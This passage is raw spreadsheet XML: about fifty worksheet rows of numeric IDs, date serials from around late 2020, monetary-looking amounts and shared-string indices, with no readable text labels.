        <v>21939</v>
      </c>
      <c r="B2283">
        <v>2031</v>
      </c>
      <c r="C2283" t="s">
        <v>16279</v>
      </c>
      <c r="D2283" t="s">
        <v>16426</v>
      </c>
      <c r="E2283">
        <v>12</v>
      </c>
      <c r="F2283" t="s">
        <v>547</v>
      </c>
      <c r="G2283" s="1">
        <v>44088</v>
      </c>
      <c r="H2283" s="4">
        <v>100000</v>
      </c>
      <c r="I2283" t="s">
        <v>9536</v>
      </c>
      <c r="J2283" t="s">
        <v>10958</v>
      </c>
    </row>
    <row r="2284" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2284">
        <v>21941</v>
      </c>
      <c r="B2284">
        <v>4878</v>
      </c>
      <c r="C2284" t="s">
        <v>7457</v>
      </c>
      <c r="D2284" t="s">
        <v>11714</v>
      </c>
      <c r="E2284">
        <v>32</v>
      </c>
      <c r="F2284" t="s">
        <v>11715</v>
      </c>
      <c r="G2284" s="1">
        <v>44113</v>
      </c>
      <c r="H2284">
        <v>3000000</v>
      </c>
      <c r="I2284" t="s">
        <v>9693</v>
      </c>
      <c r="J2284" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2285" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2285">
        <v>21942</v>
      </c>
      <c r="B2285">
        <v>4878</v>
      </c>
      <c r="C2285" t="s">
        <v>7457</v>
      </c>
      <c r="D2285" t="s">
        <v>11714</v>
      </c>
      <c r="E2285">
        <v>32</v>
      </c>
      <c r="F2285" t="s">
        <v>11716</v>
      </c>
      <c r="G2285" s="1">
        <v>44113</v>
      </c>
      <c r="H2285">
        <v>16000</v>
      </c>
      <c r="I2285" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2286" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2286">
        <v>21943</v>
      </c>
      <c r="B2286">
        <v>4878</v>
      </c>
      <c r="C2286" t="s">
        <v>7457</v>
      </c>
      <c r="D2286" t="s">
        <v>11714</v>
      </c>
      <c r="E2286">
        <v>32</v>
      </c>
      <c r="F2286" t="s">
        <v>6917</v>
      </c>
      <c r="G2286" s="1">
        <v>44113</v>
      </c>
      <c r="H2286">
        <v>15000</v>
      </c>
      <c r="I2286" t="s">
        <v>10725</v>
      </c>
    </row>
    <row r="2287" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2287">
        <v>21944</v>
      </c>
      <c r="B2287">
        <v>4821</v>
      </c>
      <c r="C2287" t="s">
        <v>7260</v>
      </c>
      <c r="D2287" t="s">
        <v>11717</v>
      </c>
      <c r="E2287">
        <v>11</v>
      </c>
      <c r="F2287" t="s">
        <v>9217</v>
      </c>
      <c r="G2287" s="1">
        <v>44159</v>
      </c>
      <c r="H2287">
        <v>10000</v>
      </c>
      <c r="J2287" t="s">
        <v>11105</v>
      </c>
    </row>
    <row r="2288" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2288">
        <v>21946</v>
      </c>
      <c r="B2288">
        <v>2586</v>
      </c>
      <c r="C2288" t="s">
        <v>5264</v>
      </c>
      <c r="D2288" t="s">
        <v>10171</v>
      </c>
      <c r="E2288">
        <v>12</v>
      </c>
      <c r="F2288" t="s">
        <v>2924</v>
      </c>
      <c r="G2288" s="1">
        <v>44119</v>
      </c>
      <c r="H2288">
        <v>1000000000</v>
      </c>
      <c r="I2288" t="s">
        <v>11718</v>
      </c>
    </row>
    <row r="2289" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2289">
        <v>21947</v>
      </c>
      <c r="B2289">
        <v>2583</v>
      </c>
      <c r="C2289" t="s">
        <v>5308</v>
      </c>
      <c r="D2289" t="s">
        <v>10215</v>
      </c>
      <c r="E2289">
        <v>12</v>
      </c>
      <c r="F2289" t="s">
        <v>2924</v>
      </c>
      <c r="G2289" s="1">
        <v>44119</v>
      </c>
      <c r="H2289">
        <v>1000000000</v>
      </c>
      <c r="I2289" t="s">
        <v>11719</v>
      </c>
    </row>
    <row r="2290" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2290">
        <v>21948</v>
      </c>
      <c r="B2290">
        <v>4821</v>
      </c>
      <c r="C2290" t="s">
        <v>7260</v>
      </c>
      <c r="D2290" t="s">
        <v>11717</v>
      </c>
      <c r="E2290">
        <v>11</v>
      </c>
      <c r="F2290" t="s">
        <v>7613</v>
      </c>
      <c r="G2290" s="1">
        <v>44159</v>
      </c>
      <c r="H2290">
        <v>10000</v>
      </c>
      <c r="J2290" t="s">
        <v>11105</v>
      </c>
    </row>
    <row r="2291" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2291">
        <v>21949</v>
      </c>
      <c r="B2291">
        <v>4821</v>
      </c>
      <c r="C2291" t="s">
        <v>7260</v>
      </c>
      <c r="D2291" t="s">
        <v>11717</v>
      </c>
      <c r="E2291">
        <v>11</v>
      </c>
      <c r="F2291" t="s">
        <v>11720</v>
      </c>
      <c r="G2291" s="1">
        <v>44159</v>
      </c>
      <c r="H2291">
        <v>10000</v>
      </c>
      <c r="J2291" t="s">
        <v>11105</v>
      </c>
    </row>
    <row r="2292" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2292">
        <v>21950</v>
      </c>
      <c r="B2292">
        <v>4821</v>
      </c>
      <c r="C2292" t="s">
        <v>7260</v>
      </c>
      <c r="D2292" t="s">
        <v>11717</v>
      </c>
      <c r="E2292">
        <v>11</v>
      </c>
      <c r="F2292" t="s">
        <v>9483</v>
      </c>
      <c r="G2292" s="1">
        <v>44159</v>
      </c>
      <c r="H2292">
        <v>10000</v>
      </c>
      <c r="J2292" t="s">
        <v>11105</v>
      </c>
    </row>
    <row r="2293" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2293">
        <v>21952</v>
      </c>
      <c r="B2293">
        <v>4821</v>
      </c>
      <c r="C2293" t="s">
        <v>7260</v>
      </c>
      <c r="D2293" t="s">
        <v>11717</v>
      </c>
      <c r="E2293">
        <v>11</v>
      </c>
      <c r="F2293" t="s">
        <v>9466</v>
      </c>
      <c r="G2293" s="1">
        <v>44159</v>
      </c>
      <c r="H2293">
        <v>10000</v>
      </c>
      <c r="J2293" t="s">
        <v>11105</v>
      </c>
    </row>
    <row r="2294" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2294">
        <v>21954</v>
      </c>
      <c r="B2294">
        <v>4821</v>
      </c>
      <c r="C2294" t="s">
        <v>7260</v>
      </c>
      <c r="D2294" t="s">
        <v>11717</v>
      </c>
      <c r="E2294">
        <v>11</v>
      </c>
      <c r="F2294" t="s">
        <v>11721</v>
      </c>
      <c r="G2294" s="1">
        <v>44159</v>
      </c>
      <c r="H2294">
        <v>10000</v>
      </c>
      <c r="J2294" t="s">
        <v>11722</v>
      </c>
    </row>
    <row r="2295" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2295">
        <v>21955</v>
      </c>
      <c r="B2295">
        <v>4821</v>
      </c>
      <c r="C2295" t="s">
        <v>7260</v>
      </c>
      <c r="D2295" t="s">
        <v>11717</v>
      </c>
      <c r="E2295">
        <v>11</v>
      </c>
      <c r="F2295" t="s">
        <v>4686</v>
      </c>
      <c r="G2295" s="1">
        <v>44159</v>
      </c>
      <c r="H2295">
        <v>10000</v>
      </c>
      <c r="J2295" t="s">
        <v>11723</v>
      </c>
    </row>
    <row r="2296" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2296">
        <v>21956</v>
      </c>
      <c r="B2296">
        <v>4821</v>
      </c>
      <c r="C2296" t="s">
        <v>7260</v>
      </c>
      <c r="D2296" t="s">
        <v>11717</v>
      </c>
      <c r="E2296">
        <v>11</v>
      </c>
      <c r="F2296" t="s">
        <v>3814</v>
      </c>
      <c r="G2296" s="1">
        <v>44159</v>
      </c>
      <c r="H2296">
        <v>10000</v>
      </c>
      <c r="J2296" t="s">
        <v>11724</v>
      </c>
    </row>
    <row r="2297" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2297">
        <v>21957</v>
      </c>
      <c r="B2297">
        <v>1400</v>
      </c>
      <c r="C2297" t="s">
        <v>3354</v>
      </c>
      <c r="D2297" t="s">
        <v>11725</v>
      </c>
      <c r="E2297">
        <v>5</v>
      </c>
      <c r="F2297" t="s">
        <v>11726</v>
      </c>
      <c r="G2297" s="1">
        <v>44095</v>
      </c>
      <c r="H2297">
        <v>2070</v>
      </c>
      <c r="I2297" t="s">
        <v>11727</v>
      </c>
      <c r="J2297" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2298" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2298">
        <v>21958</v>
      </c>
      <c r="B2298">
        <v>1400</v>
      </c>
      <c r="C2298" t="s">
        <v>3354</v>
      </c>
      <c r="D2298" t="s">
        <v>11725</v>
      </c>
      <c r="E2298">
        <v>5</v>
      </c>
      <c r="F2298" t="s">
        <v>11728</v>
      </c>
      <c r="G2298" s="1">
        <v>44095</v>
      </c>
      <c r="H2298">
        <v>2070</v>
      </c>
      <c r="I2298" t="s">
        <v>11727</v>
      </c>
      <c r="J2298" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2299" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2299">
        <v>21959</v>
      </c>
      <c r="B2299">
        <v>1400</v>
      </c>
      <c r="C2299" t="s">
        <v>3354</v>
      </c>
      <c r="D2299" t="s">
        <v>11725</v>
      </c>
      <c r="E2299">
        <v>5</v>
      </c>
      <c r="F2299" t="s">
        <v>11729</v>
      </c>
      <c r="G2299" s="1">
        <v>44095</v>
      </c>
      <c r="H2299">
        <v>10000</v>
      </c>
      <c r="I2299" t="s">
        <v>11727</v>
      </c>
      <c r="J2299" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2300" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2300">
        <v>21960</v>
      </c>
      <c r="B2300">
        <v>1400</v>
      </c>
      <c r="C2300" t="s">
        <v>3354</v>
      </c>
      <c r="D2300" t="s">
        <v>11725</v>
      </c>
      <c r="E2300">
        <v>5</v>
      </c>
      <c r="F2300" t="s">
        <v>11730</v>
      </c>
      <c r="G2300" s="1">
        <v>44095</v>
      </c>
      <c r="H2300">
        <v>64500</v>
      </c>
      <c r="I2300" t="s">
        <v>11727</v>
      </c>
      <c r="J2300" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2301" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2301">
        <v>21961</v>
      </c>
      <c r="B2301">
        <v>1400</v>
      </c>
      <c r="C2301" t="s">
        <v>3354</v>
      </c>
      <c r="D2301" t="s">
        <v>11725</v>
      </c>
      <c r="E2301">
        <v>5</v>
      </c>
      <c r="F2301" t="s">
        <v>11731</v>
      </c>
      <c r="G2301" s="1">
        <v>44095</v>
      </c>
      <c r="H2301">
        <v>494019</v>
      </c>
      <c r="I2301" t="s">
        <v>11727</v>
      </c>
      <c r="J2301" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2302" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2302">
        <v>21962</v>
      </c>
      <c r="B2302">
        <v>1400</v>
      </c>
      <c r="C2302" t="s">
        <v>3354</v>
      </c>
      <c r="D2302" t="s">
        <v>11725</v>
      </c>
      <c r="E2302">
        <v>5</v>
      </c>
      <c r="F2302" t="s">
        <v>11732</v>
      </c>
      <c r="G2302" s="1">
        <v>44095</v>
      </c>
      <c r="H2302">
        <v>211723</v>
      </c>
      <c r="I2302" t="s">
        <v>11727</v>
      </c>
      <c r="J2302" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2303" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2303">
        <v>21963</v>
      </c>
      <c r="B2303">
        <v>1126</v>
      </c>
      <c r="C2303" t="s">
        <v>3390</v>
      </c>
      <c r="D2303" t="s">
        <v>11666</v>
      </c>
      <c r="E2303">
        <v>13</v>
      </c>
      <c r="F2303" t="s">
        <v>9437</v>
      </c>
      <c r="G2303" s="1">
        <v>44081</v>
      </c>
      <c r="H2303">
        <v>0</v>
      </c>
      <c r="J2303" t="s">
        <v>11733</v>
      </c>
    </row>
    <row r="2304" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2304">
        <v>21964</v>
      </c>
      <c r="B2304">
        <v>541</v>
      </c>
      <c r="C2304" t="s">
        <v>1159</v>
      </c>
      <c r="D2304" t="s">
        <v>11734</v>
      </c>
      <c r="E2304">
        <v>16</v>
      </c>
      <c r="F2304" t="s">
        <v>11735</v>
      </c>
      <c r="G2304" s="1">
        <v>44074</v>
      </c>
      <c r="H2304">
        <v>100</v>
      </c>
      <c r="I2304" t="s">
        <v>9485</v>
      </c>
      <c r="J2304" t="s">
        <v>11736</v>
      </c>
    </row>
    <row r="2305" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2305">
        <v>21965</v>
      </c>
      <c r="B2305">
        <v>4821</v>
      </c>
      <c r="C2305" t="s">
        <v>7260</v>
      </c>
      <c r="D2305" t="s">
        <v>11717</v>
      </c>
      <c r="E2305">
        <v>11</v>
      </c>
      <c r="F2305" t="s">
        <v>11728</v>
      </c>
      <c r="G2305" s="1">
        <v>44159</v>
      </c>
      <c r="H2305">
        <v>10000</v>
      </c>
      <c r="J2305" t="s">
        <v>11106</v>
      </c>
    </row>
    <row r="2306" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2306">
        <v>21966</v>
      </c>
      <c r="B2306">
        <v>4821</v>
      </c>
      <c r="C2306" t="s">
        <v>7260</v>
      </c>
      <c r="D2306" t="s">
        <v>11717</v>
      </c>
      <c r="E2306">
        <v>11</v>
      </c>
      <c r="F2306" t="s">
        <v>5434</v>
      </c>
      <c r="G2306" s="1">
        <v>44159</v>
      </c>
      <c r="H2306">
        <v>10000</v>
      </c>
      <c r="J2306" t="s">
        <v>11105</v>
      </c>
    </row>
    <row r="2307" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2307">
        <v>21967</v>
      </c>
      <c r="B2307">
        <v>4821</v>
      </c>
      <c r="C2307" t="s">
        <v>7260</v>
      </c>
      <c r="D2307" t="s">
        <v>11717</v>
      </c>
      <c r="E2307">
        <v>11</v>
      </c>
      <c r="F2307" t="s">
        <v>11737</v>
      </c>
      <c r="G2307" s="1">
        <v>44159</v>
      </c>
      <c r="H2307">
        <v>10000</v>
      </c>
      <c r="J2307" t="s">
        <v>11106</v>
      </c>
    </row>
    <row r="2308" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2308">
        <v>21968</v>
      </c>
      <c r="B2308">
        <v>4821</v>
      </c>
      <c r="C2308" t="s">
        <v>7260</v>
      </c>
      <c r="D2308" t="s">
        <v>11717</v>
      </c>
      <c r="E2308">
        <v>11</v>
      </c>
      <c r="F2308" t="s">
        <v>11738</v>
      </c>
      <c r="G2308" s="1">
        <v>44159</v>
      </c>
      <c r="H2308">
        <v>10000</v>
      </c>
      <c r="J2308" t="s">
        <v>11739</v>
      </c>
    </row>
    <row r="2309" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2309">
        <v>21969</v>
      </c>
      <c r="B2309">
        <v>4821</v>
      </c>
      <c r="C2309" t="s">
        <v>7260</v>
      </c>
      <c r="D2309" t="s">
        <v>11717</v>
      </c>
      <c r="E2309">
        <v>11</v>
      </c>
      <c r="F2309" t="s">
        <v>547</v>
      </c>
      <c r="G2309" s="1">
        <v>44159</v>
      </c>
      <c r="H2309">
        <v>10000</v>
      </c>
      <c r="J2309" t="s">
        <v>11723</v>
      </c>
    </row>
    <row r="2310" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2310">
        <v>21970</v>
      </c>
      <c r="B2310">
        <v>4821</v>
      </c>
      <c r="C2310" t="s">
        <v>7260</v>
      </c>
      <c r="D2310" t="s">
        <v>11717</v>
      </c>
      <c r="E2310">
        <v>11</v>
      </c>
      <c r="F2310" t="s">
        <v>9453</v>
      </c>
      <c r="G2310" s="1">
        <v>44159</v>
      </c>
      <c r="H2310">
        <v>10000</v>
      </c>
      <c r="J2310" t="s">
        <v>11739</v>
      </c>
    </row>
    <row r="2311" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2311">
        <v>21971</v>
      </c>
      <c r="B2311">
        <v>4821</v>
      </c>
      <c r="C2311" t="s">
        <v>7260</v>
      </c>
      <c r="D2311" t="s">
        <v>11717</v>
      </c>
      <c r="E2311">
        <v>11</v>
      </c>
      <c r="F2311" t="s">
        <v>8109</v>
      </c>
      <c r="G2311" s="1">
        <v>44159</v>
      </c>
      <c r="H2311">
        <v>10000</v>
      </c>
      <c r="J2311" t="s">
        <v>11739</v>
      </c>
    </row>
    <row r="2312" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2312">
        <v>21972</v>
      </c>
      <c r="B2312">
        <v>4821</v>
      </c>
      <c r="C2312" t="s">
        <v>7260</v>
      </c>
      <c r="D2312" t="s">
        <v>11717</v>
      </c>
      <c r="E2312">
        <v>11</v>
      </c>
      <c r="F2312" t="s">
        <v>10667</v>
      </c>
      <c r="G2312" s="1">
        <v>44159</v>
      </c>
      <c r="H2312">
        <v>10000</v>
      </c>
      <c r="J2312" t="s">
        <v>11739</v>
      </c>
    </row>
    <row r="2313" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2313">
        <v>21973</v>
      </c>
      <c r="B2313">
        <v>4826</v>
      </c>
      <c r="C2313" t="s">
        <v>7442</v>
      </c>
      <c r="D2313" t="s">
        <v>16427</v>
      </c>
      <c r="E2313">
        <v>27</v>
      </c>
      <c r="F2313" t="s">
        <v>11016</v>
      </c>
      <c r="G2313" s="1">
        <v>44067</v>
      </c>
      <c r="H2313" s="4">
        <v>1000000</v>
      </c>
      <c r="J2313" t="s">
        <v>11740</v>
      </c>
    </row>
    <row r="2314" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2314">
        <v>21974</v>
      </c>
      <c r="B2314">
        <v>4826</v>
      </c>
      <c r="C2314" t="s">
        <v>7442</v>
      </c>
      <c r="D2314" t="s">
        <v>16427</v>
      </c>
      <c r="E2314">
        <v>27</v>
      </c>
      <c r="F2314" t="s">
        <v>609</v>
      </c>
      <c r="G2314" s="1">
        <v>44067</v>
      </c>
      <c r="H2314" s="4">
        <v>1000000</v>
      </c>
      <c r="I2314" t="s">
        <v>10642</v>
      </c>
    </row>
    <row r="2315" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2315">
        <v>21975</v>
      </c>
      <c r="B2315">
        <v>4904</v>
      </c>
      <c r="C2315" t="s">
        <v>7449</v>
      </c>
      <c r="D2315" t="s">
        <v>11741</v>
      </c>
      <c r="E2315">
        <v>27</v>
      </c>
      <c r="F2315" t="s">
        <v>10589</v>
      </c>
      <c r="G2315" s="1">
        <v>44085</v>
      </c>
      <c r="H2315">
        <v>250000</v>
      </c>
      <c r="I2315" t="s">
        <v>10003</v>
      </c>
    </row>
    <row r="2316" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2316">
        <v>21976</v>
      </c>
      <c r="B2316">
        <v>1052</v>
      </c>
      <c r="C2316" t="s">
        <v>3280</v>
      </c>
      <c r="D2316" t="s">
        <v>11742</v>
      </c>
      <c r="E2316">
        <v>29</v>
      </c>
      <c r="F2316" t="s">
        <v>4686</v>
      </c>
      <c r="G2316" s="1">
        <v>44139</v>
      </c>
      <c r="H2316">
        <v>20710</v>
      </c>
      <c r="I2316" t="s">
        <v>11743</v>
      </c>
      <c r="J2316" t="s">
        <v>10325</v>
      </c>
    </row>
    <row r="2317" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2317">
        <v>21977</v>
      </c>
      <c r="B2317">
        <v>1277</v>
      </c>
      <c r="C2317" t="s">
        <v>3396</v>
      </c>
      <c r="D2317" t="s">
        <v>11744</v>
      </c>
      <c r="E2317">
        <v>2</v>
      </c>
      <c r="F2317" t="s">
        <v>7057</v>
      </c>
      <c r="G2317" s="1">
        <v>44070</v>
      </c>
      <c r="H2317">
        <v>20000</v>
      </c>
      <c r="I2317" t="s">
        <v>9603</v>
      </c>
      <c r="J2317" t="s">
        <v>10932</v>
      </c>
    </row>
    <row r="2318" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2318">
        <v>21978</v>
      </c>
      <c r="B2318">
        <v>4889</v>
      </c>
      <c r="C2318" t="s">
        <v>7393</v>
      </c>
      <c r="D2318" t="s">
        <v>11745</v>
      </c>
      <c r="E2318">
        <v>34</v>
      </c>
      <c r="F2318" t="s">
        <v>11746</v>
      </c>
      <c r="G2318" s="1">
        <v>44155</v>
      </c>
      <c r="H2318">
        <v>300000</v>
      </c>
      <c r="I2318" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2319" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2319">
        <v>21979</v>
      </c>
      <c r="B2319">
        <v>4889</v>
      </c>
      <c r="C2319" t="s">
        <v>7393</v>
      </c>
      <c r="D2319" t="s">
        <v>11745</v>
      </c>
      <c r="E2319">
        <v>34</v>
      </c>
      <c r="F2319" t="s">
        <v>11747</v>
      </c>
      <c r="G2319" s="1">
        <v>44155</v>
      </c>
      <c r="H2319">
        <v>600000</v>
      </c>
      <c r="I2319" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2320" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2320">
        <v>21980</v>
      </c>
      <c r="B2320">
        <v>1144</v>
      </c>
      <c r="C2320" t="s">
        <v>3264</v>
      </c>
      <c r="D2320" t="s">
        <v>11748</v>
      </c>
      <c r="E2320">
        <v>16</v>
      </c>
      <c r="F2320" t="s">
        <v>3777</v>
      </c>
      <c r="G2320" s="1">
        <v>44125</v>
      </c>
      <c r="H2320">
        <v>40000</v>
      </c>
      <c r="I2320" t="s">
        <v>9536</v>
      </c>
      <c r="J2320" t="s">
        <v>10936</v>
      </c>
    </row>
    <row r="2321" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2321">
        <v>21981</v>
      </c>
      <c r="B2321">
        <v>4887</v>
      </c>
      <c r="C2321" t="s">
        <v>7481</v>
      </c>
      <c r="D2321" t="s">
        <v>11749</v>
      </c>
      <c r="E2321">
        <v>4</v>
      </c>
      <c r="F2321" t="s">
        <v>9466</v>
      </c>
      <c r="G2321" s="1">
        <v>44074</v>
      </c>
      <c r="H2321">
        <v>36000</v>
      </c>
      <c r="I2321" t="s">
        <v>11750</v>
      </c>
      <c r="J2321" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2322" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2322">
        <v>21982</v>
      </c>
      <c r="B2322">
        <v>4887</v>
      </c>
      <c r="C2322" t="s">
        <v>7481</v>
      </c>
      <c r="D2322" t="s">
        <v>11749</v>
      </c>
      <c r="E2322">
        <v>4</v>
      </c>
      <c r="F2322" t="s">
        <v>9435</v>
      </c>
      <c r="G2322" s="1">
        <v>44074</v>
      </c>
      <c r="H2322">
        <v>5400</v>
      </c>
      <c r="I2322" t="s">
        <v>11751</v>
      </c>
      <c r="J2322" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2323" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2323">
        <v>21983</v>
      </c>
      <c r="B2323">
        <v>4887</v>
      </c>
      <c r="C2323" t="s">
        <v>7481</v>
      </c>
      <c r="D2323" t="s">
        <v>11749</v>
      </c>
      <c r="E2323">
        <v>4</v>
      </c>
      <c r="F2323" t="s">
        <v>7211</v>
      </c>
      <c r="G2323" s="1">
        <v>44074</v>
      </c>
      <c r="H2323">
        <v>48000</v>
      </c>
      <c r="I2323" t="s">
        <v>11751</v>
      </c>
      <c r="J2323" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2324" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2324">
        <v>21984</v>
      </c>
      <c r="B2324">
        <v>4887</v>
      </c>
      <c r="C2324" t="s">
        <v>7481</v>
      </c>
      <c r="D2324" t="s">
        <v>11749</v>
      </c>
      <c r="E2324">
        <v>4</v>
      </c>
      <c r="F2324" t="s">
        <v>9892</v>
      </c>
      <c r="G2324" s="1">
        <v>44074</v>
      </c>
      <c r="H2324">
        <v>7200</v>
      </c>
      <c r="I2324" t="s">
        <v>11751</v>
      </c>
      <c r="J2324" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2325" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2325">
        <v>21985</v>
      </c>
      <c r="B2325">
        <v>4887</v>
      </c>
      <c r="C2325" t="s">
        <v>7481</v>
      </c>
      <c r="D2325" t="s">
        <v>11749</v>
      </c>
      <c r="E2325">
        <v>4</v>
      </c>
      <c r="F2325" t="s">
        <v>11752</v>
      </c>
      <c r="G2325" s="1">
        <v>44074</v>
      </c>
      <c r="H2325">
        <v>48000</v>
      </c>
      <c r="I2325" t="s">
        <v>11751</v>
      </c>
      <c r="J2325" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2326" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2326">
        <v>21986</v>
      </c>
      <c r="B2326">
        <v>4887</v>
      </c>
      <c r="C2326" t="s">
        <v>7481</v>
      </c>
      <c r="D2326" t="s">
        <v>11749</v>
      </c>
      <c r="E2326">
        <v>4</v>
      </c>
      <c r="F2326" t="s">
        <v>11753</v>
      </c>
      <c r="G2326" s="1">
        <v>44074</v>
      </c>
      <c r="H2326">
        <v>48000</v>
      </c>
      <c r="I2326" t="s">
        <v>11751</v>
      </c>
      <c r="J2326" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2327" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2327">
        <v>21987</v>
      </c>
      <c r="B2327">
        <v>4887</v>
      </c>
      <c r="C2327" t="s">
        <v>7481</v>
      </c>
      <c r="D2327" t="s">
        <v>11749</v>
      </c>
      <c r="E2327">
        <v>4</v>
      </c>
      <c r="F2327" t="s">
        <v>11754</v>
      </c>
      <c r="G2327" s="1">
        <v>44074</v>
      </c>
      <c r="H2327">
        <v>7200</v>
      </c>
      <c r="I2327" t="s">
        <v>11751</v>
      </c>
      <c r="J2327" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2328" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2328">
        <v>21988</v>
      </c>
      <c r="B2328">
        <v>4887</v>
      </c>
      <c r="C2328" t="s">
        <v>7481</v>
      </c>
      <c r="D2328" t="s">
        <v>11749</v>
      </c>
      <c r="E2328">
        <v>4</v>
      </c>
      <c r="F2328" t="s">
        <v>3814</v>
      </c>
      <c r="G2328" s="1">
        <v>44074</v>
      </c>
      <c r="H2328">
        <v>240000</v>
      </c>
      <c r="I2328" t="s">
        <v>11751</v>
      </c>
      <c r="J2328" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2329" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2329">
        <v>21989</v>
      </c>
      <c r="B2329">
        <v>4887</v>
      </c>
      <c r="C2329" t="s">
        <v>7481</v>
      </c>
      <c r="D2329" t="s">
        <v>11749</v>
      </c>
      <c r="E2329">
        <v>4</v>
      </c>
      <c r="F2329" t="s">
        <v>1746</v>
      </c>
      <c r="G2329" s="1">
        <v>44074</v>
      </c>
      <c r="H2329">
        <v>24000</v>
      </c>
      <c r="I2329" t="s">
        <v>11751</v>
      </c>
      <c r="J2329" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2330" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2330">
        <v>21990</v>
      </c>
      <c r="B2330">
        <v>4887</v>
      </c>
      <c r="C2330" t="s">
        <v>7481</v>
      </c>
      <c r="D2330" t="s">
        <v>11749</v>
      </c>
      <c r="E2330">
        <v>4</v>
      </c>
      <c r="F2330" t="s">
        <v>11755</v>
      </c>
      <c r="G2330" s="1">
        <v>44074</v>
      </c>
      <c r="H2330">
        <v>540</v>
      </c>
      <c r="I2330" t="s">
        <v>11751</v>
      </c>
      <c r="J2330" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2331" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2331">
        <v>21991</v>
      </c>
      <c r="B2331">
        <v>4887</v>
      </c>
      <c r="C2331" t="s">
        <v>7481</v>
      </c>
      <c r="D2331" t="s">
        <v>11749</v>
      </c>
      <c r="E2331">
        <v>4</v>
      </c>
      <c r="F2331" t="s">
        <v>11756</v>
      </c>
      <c r="G2331" s="1">
        <v>44074</v>
      </c>
      <c r="H2331">
        <v>3600</v>
      </c>
      <c r="I2331" t="s">
        <v>11751</v>
      </c>
      <c r="J2331" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2332" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2332">
        <v>21992</v>
      </c>
      <c r="B2332">
        <v>4887</v>
      </c>
      <c r="C2332" t="s">
        <v>7481</v>
      </c>
      <c r="D2332" t="s">
        <v>11749</v>
      </c>
      <c r="E2332">
        <v>4</v>
      </c>
      <c r="F2332" t="s">
        <v>9585</v>
      </c>
      <c r="G2332" s="1">
        <v>44074</v>
      </c>
      <c r="H2332">
        <v>1800</v>
      </c>
      <c r="I2332" t="s">
        <v>11751</v>
      </c>
      <c r="J2332" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="2333" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2333">
        <v>21993</v>
      </c>
      <c r="B2333">
        <v>4887</v>
      </c>
      <c r="C2333" t="s">
        <v>7481</v>
      </c>
      <c r="D2333" t="s">
        <v>11749</v>
      </c>
      <c r="E2333">
        <v>4</v>
      </c>
      <c r="F2333" t="s">
        <v>9586</v>
      </c>
      <c r="G2333" s="1">
        <v>44074</v>
      </c>
      <c r="H2333">
        <v>270</v>
      </c>
      <c r="I2333" t="s">
        <v>11751</v>
      </c>
      <c r="J2333" t="s">
        <v>10492</v>
      </c>
    </row>
